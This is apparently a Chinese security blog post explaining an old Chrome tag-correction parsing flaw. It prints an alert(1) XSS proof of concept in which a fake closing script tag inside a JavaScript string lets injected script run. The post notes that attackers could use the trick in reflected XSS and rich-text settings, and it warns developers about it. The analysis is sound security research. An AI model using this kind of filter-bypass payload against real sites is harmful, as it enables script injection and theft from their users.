chrome标签修正特性漏洞

之前的那篇给出了chrome标签修正特性漏洞的两个原型,是在老外发出的11的漏洞思路上的再延展。

我说这个是只属于chrome xss filter的标签修正特性有点误导,这个是全局的,来看下面老外发的这个漏洞
http://code.google.com/p/chromium/issues/detail?id=68484

 

测试代码是

<script><!--
var x = "pwned</script x\><script x\>alert(1);//";
//--></script>


结果被修正为

<html>
<head>
<script><!--
var x = "pwned</script>
<script x\>alert(1);//";
//--></script>
<script></script>
</head>
<body></body>
</html>

 

chrome动态修正了这个HTML文档的3处节点:

1. </script x\> 修正为 </script>

2. 闭合了<script x\>

3. 闭合多出的</script>

chrome的标签修正特性只是按标签配对来修正的,没有考虑HTML注释或其他复杂的情况,所以alert(1)执行了!


深入分析就会发现chrome的标签修正特性漏洞影响深远,在各种复杂的应用环境中会产生漏洞。

黑客不仅可以用于非持久型的XSS漏洞,还能用于富文本环境中,也提醒各位程序员和安全工程师,你在服务端精心布置的安全防御策略,可能会被客户端歪曲修正为安全漏洞。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值